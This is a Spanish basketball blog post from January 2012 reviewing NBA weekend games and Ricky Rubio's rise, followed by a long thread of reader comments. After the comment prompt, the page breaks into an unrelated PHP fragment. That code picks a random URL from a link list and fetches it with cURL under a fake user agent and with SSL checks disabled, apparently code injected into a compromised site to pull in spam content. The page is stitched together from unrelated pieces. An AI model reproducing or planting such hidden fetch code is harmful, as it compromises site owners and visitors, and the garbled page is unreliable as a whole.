Informe del fin de semana: Ricky Rubio deja su firma

02 de January de 2012 por TheDeerHunter

Antes de entrar en harina con la jornada de año nuevo repasemos brevemente lo que ha ocurrido durante el último fin de semana del año. Casi todo ya lo habeís ido comentando nuestros visitantes.

La gran noticia del viernes noche en nuestro país fue la celebrada actuación de Ricky Rubio ante los Heat. No sirvió por un pelo para amarrar la victoria (103-101) ante un rival que está para otras guerras, pero sí es importante para él como reivindicación. Veremos si la ilusión que están despertando los Wolves ante el público del Target Center puede traducirse en confianza y victorias.

También Marc jugó un partidazo ante Houston, causando estragos en la zona junto a Zach. En su caso sí sirvió para estrenarse (93-113), como también lo hicieron Celtics, Mavs, Suns y Jazz. A destacar también el choque que se disputó en Indianápolis, donde los Pacers necesitaron de prórroga para doblegar a los Cavs (91-98).

El sábado vimos el inmenso debut de Bynum, sumando una importantísima victoria ante Denver (89-92). Por victorias cuenta Oklahoma sus actuaciones, la quinta ante Phoenix (97-107). La sorpresa fue esta vez un partido flojo de Durant, y que el choque lo resolvieron Westbrook y un letal Daequan Cook. A destacar también la primera victoria de los Pistons con un partido memorable de la dupla Monroe-Jerebko (88-96). Por cierto, los Spurs lograron para Popovic la 800ª victoria de su carrera ante los Jazz (89-104). Se dice pronto.

Ayer contemplamos una nueva derrota de los Lakers esta vez frente los Nuggets, que les devolvieron la jugada de hace un par de días (90-99), y una paliza monumental de los Bulls a los Grizzlies de Marc Gasol. Nada menos que 40 puntos de diferencia (64-104) debido, en parte, a que los ositos solo anotaron el 31% de los tiros que intentaron. Los Wizards perdieron frente los Celtics (94-86) y continúan siendo el único equipo de la NBA que no se ha estrenado. Por contra, los Heat sumaron ante los Bobcats su quinta victoria consecutiva (90-129). Finalmente, los españoles Ricky Rubio y Jose Calderon cuajaron buenas actuaciones con resultado dispar. Los Wolves ganaron a los Mavs (82-99) con 14 puntos y 7 asistencias de Ricky, mientras que los Raptors cayeron frente los Magic (96-102) a pesar de los 18 puntos y 13 asistencias del extremeño.

PREMIOS

MVP: Cada uno de los 34 puntos, 8 rebotes, 10 asistencias, 4 robos y 1 tapón que firmó LeBron James ante los Wolves la noche del viernes fueron indispensables para mantenerse invictos. De paso LeBron es, hasta el momento, el MVP de la competición. Rajon Rondo se marcó anoche el primer triple doble de la temporada frente los Wizards. Fueron 18 puntos, 11 rebotes y 14 asistencias.

Rookie: Algunos niegan que Ricky Rubio sea rookie de nada a estas alturas. Los 12 puntos, 12 asistencias, 6 rebotes y 1 robo que consiguió frente los todopoderosos Heat son su verdadera carta de presentación ante los EEUU. Y los 14 puntos y 7 asistencias
que ha logrado esta madrugada en la primera victoria de la temporada de los Wolves son la confirmación de que la liga no se le queda grande.

Sorpresa: Derrick Favors cuajó el viernes el mejor partido de su carrera hasta el momento. 20-11 que le dieron la primera victoria a los Jazz del campeonato.

Decepción: Los Indiana Pacers perdieron su imbatibilidad el sábado frente a los Pistons de un Lawrence Frank que acumulaba nada menos que 20 derrotas consecutivas. Y anoche los Grizzlies perdieron de 40 puntos. Los Rudy Gay (2 de 12), Jeremy Pargo (2 de 13), OJ Mayo (2 de 9), Josh Selby (3 de 9), Josh Davis (3 de 9), etc. tuvieron un día aciago. Pero si hay que personalizar el premio el candidato es Kobe Bryant: 6 de 28 en tiro, 6 pérdidas, -8 de eficiencia. El peor partido de carrera.

Mayor esfuerzo en vano: La exhibición de Blake Griffin el viernes (34-13) no sirvió para evitar la derrota ante Chicago. Los Clippers empiezan a darse cuenta que lo que se avecina no es ningún camino de rosas.

Imágenes | AP Photos / Getty Images

Comenta

45 comentarios a esta entrada

  1. Nacho dice:
    #1

    Un apunte Deer, en la crónica dices que Ricky perdió anoche su partido, no es así.
    Y ya puestos vamos a hablar de Ricky:
    1. Sus Wolves molan, y al loro con ellos. Llevan1-3, pero es que han perdido en casa, en el último segundo, contra Heat y Thunder, los claros favoritos para las finales. El otro que perdieron, fuera de casa, en Millwake, y también en los segundos finales. Y ayer se merendaron a los Mavericks, que vale que no han empezado bien, pero son los campeones.
    2. La fría estadística no lo es todo. Ricky ayer 14/7, Calde 18/11. A priori parece que fue mejor el partido del extremeño, y cierto que jugó unos impresionantes tres pirmeros cuartos, pero resurgieron los Magic y su tiro de tres, y perdió el partido. Pero lo de Rubio fue… merece punto y aparte.
    3. Los Wolves ahí estuvieron los tres primeros cuartos, renqueantes, incluso llevando ventajas, con un Ricky discreto. Empezaron el último cuarto y llegaron a tener 10 de ventaja, El de Masnou empezó a jugar, ¡JUGÓN!. Se acercan a dos los de Dallas, y a falta de poco más de 4 minutos, Rubio toma el mando en plaza, y eso es mandar. Los puntos los había metido al principio del cuarto (por cierto, empezó 0 de 3 y terminó 5 de 9, eso ya dice algo de su carisma) Pero lo más espectacular es cómo dominó el juego, cómo obligó a cerrarse a la defensa, y cómo (por sus anotaciones anteriores) empezaron a buscarle el dos contra uno, para ahora sí, lucirse doblando pases. Y con un sorprendente Tolliver enchufándolo casi todo, y el inmenso Love, que como decía Pop anoche parecía Reggie Miller, se fueron poco a poco los de Minnesota en el marcador. Y eso con una buena defensa (no permitieron ningún punto en este tiempo) hizo que ganasen el primer partido (lo habían merecido antes) y se desatase la locura allí.
    $. No son todo estadísticas, en efecto. Ni el mando en plaza. Lo más importante de Ricky es el componente de Magia que imprime en lo que le rodea. Allí le adoran. Sale a cancha y el público en pie. La sonrisa de Love (alma del equipo) tras asistencia de Rubio a quien sea, es la leche. Como mira desde la distancia el abuelo Adelman, sin dejar escapar esa sonrisa hacia su nieto preferido, brutal. Como, con el partido en su momento de locura, a falta de dos minutos, diez arriba, se abren los cuatro atacantes, espera el defensor en la línea de tripl, y Ricky bota a media cancha, y el pabellón se pone en pie para aplaudir al nuestro y a su equipo. Los vellos como escarpias se me pusieron.
    4. Sumemos a eso que la única cara que desentonaba por ese banquillo era la de Beasley, hizo mal partido (no es noticia) y pareció que le jodía que fuesen otros los que se llevaban los aplausos (Rubio y un brutal Love, pero este panegírico es para el catalán) Su lesión final en el dedo es la imagen de la desolación del que huye de la victoria de los suyos.
    5. Y efectivamente, ves jugar a Ricky allí, y en cuatro partidos parece que llevase dos temporadas, tiene el temple del veterano, y lo es. Será rookie allí, pero realmente no lo es. ¿Que puede ser un espejismo? Igual, pero lo que ha hecho esta semana será recordado en Minneápolis, y por lo menos en mi casa.
    6. ¡Macho!, me he pasado, parezco un libelo españolista tipo marca, as, mundo deportivo (ah! este es catalanista)

      Citar

  2. Viva_Dirk dice:
    #2

    A Beasley deberian largarlo lo antes posible por alguien de menos potencial pero que realmente quiera jugar en un equipo, a poder ser por un escolta porque a Wes Johnson se le ve muy perdido cuando juega ahí. Me encantaría por ejemplo un Beasley por Marcus Thornton.

      Citar

  3. TheDeerHunter dice:
    #3

    @Nacho: Hablaba del viernes… de anoche aún no hemos comentado nada (ahora vamos)

      Citar

  4. inad23 dice:
    #4

    Creo que DeMarcus Cousins se quiere largar,un buen cambio seria Beasly por el y luego cambiar a Milicic por algun escolta con ganas de trabajar…

      Citar

  5. Ru dice:
    #5

    Viva_Dirk: A Beasley deberian largarlo lo antes posible por alguien de menos potencial pero que realmente quiera jugar en un equipo, a poder ser por un escolta porque a Wes Johnson se le ve muy perdido cuando juega ahí. Me encantaría por ejemplo un Beasley por Marcus Thornton.

    Totalmente de acuerdo,Beasley va a paso cambiado con el espíritu del equipo en estos momentos y lo mejor para los lobos sería un traspaso para obtener un SG.Por otra parte Cousins no jugó el partido con Sacramento porque solicitó ser traspasado y Whestpal lo dejó en casita mientras el agente del jugador negaba cualquier acusación.Veremos si la bola se hace más grande con el paso de los días porque Cousins es un jugador que será muy importante en la NBA,más allá de que esté mal de la chaveta.

      Citar

  6. rumbero dice:
    #6

    Lo de Beasley es desesperante. Talento tiene de sobras, pero parece que la cosa no va con él. Por un lado la poca implicación/motivación. Y luego esa cabecita que tiene…¿que llevo un 2/13? pues nada me tiro 10 mandarinas más y me da exactamente igual. Un lacito y se cambía por un escolta decente (y se prueba con D.Williams de 3)

    Lo de Ricky es acojonante. Independientemene de las estadísitcas (lleva un 60% en T2 y T3 y obviamente acabará bajándolos) cada vez toca un balón o se prepara para salir la gente se vuelve loca. Le da otro aire al equipo y sus compañeros se lo creen.

      Citar

  7. Txusma dice:
    #7

    Nacho tiene razón. En el párrafo de resumen de lo que pasó anoche he explicado que Ricky perdió su partido. Lo corrijo rápidamente.

      Citar

  8. TheDeerHunter dice:
    #8

    jojojo… vale entendido

      Citar

  9. busky23 dice:
    #9

    Txusma,Deer,hoy sin piedad con Kobe jajaja

      Citar

  10. Txusma dice:
    #10

    Cambiar a un cabeza loca como Beasley por otro cabeza loco como Cousins no creo que sea una gran solución. Cousins debería mirar a Andray Blatche para aprender en lo que no debe convertirse: jugadores jóvenes con un talento indiscutible pero con una cabeza que no está acorde con el resto.
    Esta clase de jugadores creo que deberían ir a equipos veteranos, experimentados con jugadores con galones que les dejen las cosas claras. Nada de equipos jóvenes en los que puedan creerse los líderes.

      Citar

  11. Ru dice:
    #11

    El pase de Ricky a Tolliver por debajo de las piernas de Dirk el nº 1 en el TOP 10 del día.

    Viendo el desastre de equipo que son los Nets,que aspiran a tener a D.Howard en sus filas,cualquier posibilidad de hacerme con jugadores “talentosos” como Beasley o Cousins no la desaprovecharía..el problema es que no tienen nada de nada para hacer trades.Me juego el cuello que Deron no sigue allí y que Howard acaba yendo a Brooklyn…de turismo.

      Citar

  12. Txusma dice:
    #12

    Cousins-Lopez puede ser una pareja interesante y cuando un jugador demuestra semejante falta de profesionalidad como Cousins, es común que lo dejen ir por bien poco. Algún alero les vendría bien pero los Nets tb son un solar en este aspecto.

      Citar

  13. HisRoyalAirness dice:
    #13

    Lo de Ricky ayer fue un escándalo. No voy a comentar más porque sino me enrollo pero fue un espectáculo.

    Lo de Beasley, en fin, una pena. Es uno de los jugadores más desesperantes de la liga. La lesión es una buena oportunidad para que Derrick Williams empiece a comerle la tostada.
    No sé si los Wolves necesitan tanto un SG como un center porque la cabecita de Darko a veces es para echarse a temblar.

    El partido de Kobe nauseabundo y el nivel de Bynum está siendo tremendo

      Citar

  14. busky23 dice:
    #14

    Esta claro que Cousins es un jugador devaluado,mas por su actitud que por su indiscutible calidad.
    Dumars ya lo quiso pescar en su día en el draft y podría volver a intentarlo ahora. Ofreciendo su elección entre las 10 primeras del próximo draft +Bynum o Daye (seria un error un cambio a pelo por Monroe),podría acabar en Detroit.
    Otra cosa es si seria un destino del agrado de Cousins conociendo su afán de protagonismo donde Stuckey Gordon, Prince o el propio Monroe absorben gran parte del protagonismo anotador.
    Lo que parece bastante claro es que no acabara la temporada en los Kings.

      Citar

  15. Denise dice:
    #15

    Ricky bien, pero el mejor rookie de la temporada por el momento para mí es Norris Cole…JUGÓN!!

    Actualmente Lebron se merienda comodamente a Kobe. Por el bien de Gasol, espero que esta sea su ultima temporada en Lakers. Actualmente, tienen la 2º o 3º mejor plantilla del campeonato y tienen opciones de título, pero a partir del año que viene, los Lakers sudaran para entrar en Playoffs.

    Beasley es un asco, y Wesleu Johnson como alguien ha dicho por arriba me parece un pufo. A Derrick Williams le dare margen ya que solo lleva 4 partidos. Si disponen de rondas en el Draft, los Wolves deberian ser inteligentes y perder partidos, pillar un top 5 del Draft y tendrán un buen proyecto para los proximos años.

      Citar

  16. HeiNeKeN dice:
    #16

    Ricky es muy listo, cada vez que estaba en pista con Beasley no paraba de hablar con el en plan “hace 5 jugadas que no te la paso, pero tranquilo que me acuerdo de ti”.

    Si Randolph no se precipitase tanto, el juego interior de los Wolves sería increible, pero casi prefiero al Randolph de este principio de temporada, intentando demostrar lo que vale aunque se precipite que al tio pasota que ha sido toda su carrera.

    Mención a parte Tolliver, el tio tira con una confianza increible, le da igual haber fallado ya 3 triples, que si se la dan en la esquina, se lo tira y en cuanto el entra uno, es un no parar.

      Citar

  17. Nacho dice:
    #17

    Denise: Ricky bien, pero el mejor rookie de la temporada por el momento para mí es Norris Cole…JUGÓN!!

    Cómo te columpias cuando quieres. Lo de Cole puede ser brutal, e hizo un cuarto brillante contra Boston, pero su incidencia en el juego global del equipo no es comparable a la de Ricky. Y vale que si fuese al revés habría que darte la razón. Hablamos de un tío que cambia dinámicas no solo del equipo, si no de la afición (ayer coreando su nombre a falta de dos minutos) la ciudad y la prensa del entorno. Y paro de hablar de Ricky que parezco su abuelo.
    ¡¡¡MELO!!! ¿DÓNDE ESTÁS?????????
    Vuelve que Denise se apropia de tus comentarios, jejeje

      Citar

  18. Nacho dice:
    #18

    Coño! No me sale lo de citar solo un cacho, obvio que el segundo párrafo es mío, xD. ¡Montes! ¡Enséñame!

      Citar

  19. Denise dice:
    #19

    No quito méritos a Ricky pero no hay que olvidarse que Norris Cole está demostrando su liderazgo y mucha valentía en un equipazo donde están nada mas y nada menos que Lebron, Wade y Bosh. En la semana y media que llevamos, para mi sería el rookie del año ahora mismo.

    PD: Melo está castigado. Hoy no visitará el blog. Me ha dicho su profede Lengua, Don Anselmo, que ha suspendido todas las asignaturas del primer trimestre. Incluso, su profe de Religión, Doña Consuelo, me ha dicho que llegó a poner en un examén que Dios era Carmelo Anthony y Amare Stoudemire su profeta…xD

      Citar

  20. Pirata dice:
    #20

    Que cabrón!!!

      Citar

  21. rumbero dice:
    #21

    Es que lo de Cole es espectacular. Contra Boston se salió, a Ricky se las hizo pasar canutas y ayer se volvió a marcar un partidazo. Van como un tiro este año los Heat. Madre mia si tuvieran un center…

    De esta madrugada me quedo también con el final de partido que se cascó Paul cuando los Blazers apretaban, con un triple imposible, dos entraditas marca de la casa y una gran defensa en la última jugada. Sigo pensando que les va a acabar saliendo bien el polémico trade a los Clippers

      Citar

  22. melo15 dice:
    #22

    Ya estoy aqui, pero lo de religion es buena idea.
    Bueno, he de aceptar que ricky que es un pedazo de jugador y que si sigue asi puede llegar a ser all-star.
    Derrick favors sera el MIP deguro, los Jazz han de empezar ha darle minutos, porque el tio es espectacular.
    Esto de Cousins me ha chocado, para mi es un pedazo de jugador con un potencial terrible y dudo que los kings lo traspasen, porque es de los mejores sino el mejor pivot joven de la NBA.
    Lo de Beasley es brutal, un tio con este potencial, y que tire su carrera profesional de esta manera, hasta Melo curraba mas.

      Citar

  23. melo15 dice:
    #23

    Gracias Denise por apoyar a los demas Rookies durante mi ausencia.

      Citar

  24. M dice:
    #24

    Lo mejor de Ricky es lo que transmite, toda la magia que le dejan sacar y que se le ve feliz. Y nosotros con él. Madre mía, contra Miami se adueñó completamente del partido. Ojalá le siga yendo todo tan bien 🙂

      Citar

  25. Cocinitas dice:
    #25

    Vi anoche dos partidos, el Wolves- Mavericks, y el Nuggets-Lakers. Lo de Ricky ayer en la segunda parte fue increíble, llegó al descanso con 2 puntos y 2 asistencias, y terminó con 14 y 7 dando un espectáculo tremendo. Viendo lo que hizo ayer no me cabe duda de que en menos de 4 o 5 partidos será el titular y si sus compañeros están acertados pasará de las 10 con asiduidad.
    El otro partido que vi fue un esperpento de los Lakers en los últimos dos minutos. Partido empatado a 90 puntos, Kobe haciendo un partidazo con 5 de 24 tiros anotados (modo irónico ON) y va el señor y se tira 3 mandarinas y pierde un balón, lamentable. Estuvieron enormes Bynum y Gasol, y sorprendentemente funciona usar al señor Paz Mundial de 6º hombre funciona, e incluso Blake hizo un partidazo. Pero Kobe ayer tenía la necesidad de hacer perder a su equipo y lo consiguió el solito. Es una pena que con el equipo que tienen estos Lakers sobretodo su juego interior, el mejor de largo, tengan esa pasividad defensiva, ese desdén. Es una pena que Kobe no pueda ser traspasado, estos Lakers con un buen base (Deron, Paul) y un escolta que defienda a la estrella rival serian temibles.

      Citar

  26. melo15 dice:
    #26

    Un escolta en plan Affalo o Tony Allen

      Citar

  27. Denise dice:
    #27

    Kobe a Houston a cambio de Lowry, Kevin Martin y Scola jeje
    y Tony Allen y una cesta de Navidad por Carmelo Anthony

      Citar

  28. melo15 dice:
    #28

    No Allen a los Knicks, no nos hace falta, lo que nos hace falta es un tio en plan Mbah-Aboute, el de los bucks

      Citar

  29. Blade Petrovic dice:
    #29

    melo15:
    Ya estoyaqui, pero lo de religion es buena idea.
    Bueno, he de aceptar que ricky que es un pedazo de jugador y que si sigue asi puede llegar a ser all-star.
    Derrick favors sera el MIP deguro, los Jazz han de empezar ha darle minutos, porque el tio es espectacular.
    Esto de Cousins me ha chocado, para mi es un pedazo de jugador con un potencial terrible y dudo que los kings lo traspasen, porque es de los mejores sino el mejor pivot joven de la NBA.
    Melo en mi opinion de colejial el mip sera para ty lawson o harden favors explotara el año que viene(si hay mundo)
    Lo de Beasley es brutal, un tio con este potencial, y que tire su carrera profesional de esta manera, hasta Melo curraba mas.

      Citar

  30. Blade Petrovic dice:
    #30

    No

      Citar

  31. Blade Petrovic dice:
    #31

    Qiro joderos pero a ricky se le escapa wade en el ultimo tiro de miami

      Citar

  32. melo15 dice:
    #32

    No que? Esque no entiendo

      Citar

  33. rumbero dice:
    #33

    Blade Petrovic:
    Qiro joderos pero a ricky se le escapa wade en el ultimo tiro de miami

    Hombre es que Wade se escaparía del mismísimo diablo xD Luego encima es capaz de volar y meterla fácil. (Aparte de eso la jugada está muy bien trenada por Miami)

      Citar

  34. HisRoyalAirness dice:
    #34

    Blade Petrovic:
    Qiro joderos pero a ricky se le escapa wade en el ultimo tiro de miami

    A mí no me jodes mucho, teniendo en cuenta que la marca no era de Ricky y que su defensor se engancha en el primer bloqueo y Ricky, al hacer la ayuda, en el segundo.

    Y vamos, si ahora Ricky tiene que cubrir a Wade apaga y vámonos.

    Todos los anti-Ricky estáis bastante biliosos, yo cada vez que lo veo jugar me descojono

      Citar

  35. Blade Petrovic dice:
    #35

    Yo no soi anti ricky sino no lo hubiera elejido en la hoops

      Citar

  36. melo15 dice:
    #36

    Esque su manera de jugar no me gusta, no es un buen anotador, no es atletico, por eso me gusta mas Kemba, Knight porque son anotadores, atleticos…y por no hablar de Irving que el tio es buenisimo, direccion, anotacion, cabeza, buen defensor, esto lo hace el mejor base del draft.
    Que creeis Irving o Ricky?

      Citar

  37. Viva_Dirk dice:
    #37

    No se Melo, creo que Ricky no tiene nada que envidiar a los que nombras, si bien no tiene su físico si tiene muchos años de experiencia en alta competición y es jugador de un talento enooooooorme. Yo he apostado por el como rookie del año.

    En cuantoa Cousins, no se si sería un buen fichaje para estos Wolves, aunque desde luego por Beasley+Milicic lo hacia ya mismo, jeje.

      Citar

  38. melo15 dice:
    #38

    Si, el duelo con Kemba y Knight esta muy igualado, y esa experiencia que tu dices puede ayudar mucho a Ricky, pero para mi sigue siendo mejor que Ricky y con mas potencial.
    PD:No pongo a Fredette porque es mucho peor que estos cuatro bases.

      Citar

  39. Pop dice:
    #39

    melo15: Si, el duelo con Kemba y Knight esta muy igualado, y esa experiencia que tu dices puede ayudar mucho a Ricky, pero para mi sigue siendo mejor que Ricky y con mas potencial.PD:No pongo a Fredette porque es mucho peor que estos cuatro bases.

    Hace poco estuve viendo un articulo en nba.com en la que preguntaban a una serie de expertos quién era el rookie que más futuro tiene. Concretamente creo que la cuestion era que quién sería mejor dentro de 5 temporadas o algo así. Curiosamente casi nadie apuesta por Ricky de cara a Rookie del Año, hablaban sobre todo de D.Williams; pero casi todos acababan diciendo que Ricky sería el mejor jugador de toda esta hornada dentro de 5 temporadas. Y yo creo que al final será así porque Rubio tiene la desventaja física y la ventaja mental, y aquella es mucho más fácil de mejorar que la segunda.

    Melo, no te fijes tanto en los datos. Ayer a Ricky le bastaron 5 minutos para volver chiflados completamente a Dallas, y todo lo que hizo fue meter un par de canastas y dar 3-4 asistencias seguidas. Pero el desquicie para Dallas fue total.

      Citar

  40. Blade Petrovic dice:
    #40

    Yo estoy con Viva_Dirk la experiencia de Ricky sera un valor para que coja confianza y su talento…….
    es un tío al estilo Kidd….Muy buen pasador pero no ess ni un jugador atletico ni anotador aunque sus highlights son espectaculares sino mira el top ten de ayer

      Citar

  41. melo15 dice:
    #41

    Vale pero aqui en España, no somos del todo objetivos calificando a jugadores que compiten contra los nuestros, hablo por supuesto de BRANDON ROY el 3 mejor shooting guard de la NBA y aqui la llamabamos chupon y cosas de estas solo porque era muchisimo mejor que Rudy, y le “robaba” minutos.
    Y yo he visto en muchas paginas de la NBA comparar a Kemba con Tim Hadaway, y el tio se ha marcado 17 puntos contra los Heat con un equipo mucho peor que el de Ricky que cuenta con un all-star, dos numeros 2 del draft y un numero 4, y creo que tampoco se esta siendo justo con los demas rookies, como Knight, cuando este tiene 2 años menos que Ricky y en un equipo acabado como son los Pistons, o Irving, infinitamente mejor que Rick) y en un equipo pesimo.

      Citar

  42. Denise dice:
    #42

    Pero Melo, cuando mas acabado esta un equipo, mas facil es hacer números. No le quito meritos a tu querido Kemba, pero tiene todas las bolas del mundo para tirarselas.

    Por eso, para mi el mejor rookie y el que mas merito tiene es Norris Cole. Haciendo partidazos aun compartiendo bolas con Lebron, Wade o Bosh

      Citar

  43. melo15 dice:
    #43

    Si pero los resultados (que es lo que importa) no son buenos, y si yo soy un base y he de far una asistencia ha un tio que va ha tirar de 3 a quien se la doy, a Kevin Love o Boris Diaw?

      Citar

  44. M dice:
    #44

    Eso son números. Pero el juego es mucho más que cifras, y ver la forma de dominar los partidos de Ricky está siendo maravilloso.

      Citar

  45. Sancho88 dice:
    #45

    Yo creo que con Ricky no solo vale hablar de números. La pasión que ha levantado en Estados Unidos no la han levantado el resto de rookies, ni casi nadie últimamente en esa liga. Ya está, los yankis tienen ganas de ricky, se han enamorado de él. Los números son secundarios, y el espectáculo que está dando es lo principal. Además, Ricky está ganando partidos. De momento solo Irving puede decir lo mismo. Que hacen más puntos que Ricky? indiscutible. Que son más de lo mismo? También indiscutible, xd. La gente quiere magia, quiere magia y efectividad al mismo tiempo. No quiere la pata de jamón entera, 25 puntos por noche. Quiere el perfume, cuatro o cinco canastas, 10 pases maravillosos, parar el partido y ver que le estás ganando al campeón y que el chaval que tiene la bola le sobra carisma para hacer eso o para tocar al lado de Bruce Spreesting si se lo propusiera. Maquilladores de estadísticas ha habido muchos en la historia de la nba. Genios, no tantos. Y desde Steve Nash no se veía nada parecido, es decir, talento y efectividad cogidos de la mano. Y eso arrasa to lo quemao, como dice José Mota. xd

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>